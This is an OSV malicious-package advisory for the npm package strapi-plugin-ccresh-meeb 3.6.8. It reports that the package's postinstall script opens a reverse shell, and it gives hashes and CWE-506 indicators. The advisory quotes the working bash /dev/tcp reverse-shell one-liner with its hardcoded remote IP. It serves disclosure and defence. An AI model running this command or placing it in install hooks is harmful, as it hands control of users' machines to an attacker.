MAL-2026-16180

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccresh-meeb/MAL-2026-16180.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16180
Published
2026-09-15T15:52:37Z
Modified
2026-09-15T16:31:25Z
Summary
Malicious code in strapi-plugin-ccresh-meeb (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797)

The package's postinstall lifecycle script (scripts.postinstall: node postinstall.js) unconditionally invokes /bin/bash with an interactive reverse-shell payload at install time: bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a Reverse shell payload for Strapi. Any npm install of this package results in remote code execution and interactive shell access as the installing user.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020045",
            "import_time": "2026-09-15T16:19:13.733654239Z",
            "modified_time": "2026-09-15T15:52:37Z",
            "sha256": "5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-ccresh-meeb

Package

Name
strapi-plugin-ccresh-meeb
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-ccresh-meeb

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "dfa7478eb73161feed4ab606f488ee08eda7efe631fb5fc3b1a78367d4f52ad4",
            "tlsh": "ae11cb4166f9673562338ddde60b942ba3474e05703ae517b98c03171ec6c8cc5426fd"
        },
        {
            "path": "package.json",
            "sha256": "3a8553e38980c3bbc8feefcc09bdd662ac3c5075b992ab0f15105f7d81c38d34",
            "tlsh": "c9d0a7148a119333bdc4679d1823820bab719e071415f82c27f71148024bbfb9c7b35f"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-ccresh-meeb-3.6.8.tgz",
            "hashes": {
                "sha1": "0a38b1f93e23d1a7188cbc0ebb3976330ccb6416",
                "sha512_sri": "sha512-mbufN4JprRF1qe7nBqnnlqrSHG03dyx4IKM0SigPfqYq1O333rglPczZdoUATY/h/+bydC9A7ogVUr2YOM/PPw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccresh-meeb/MAL-2026-16180.json"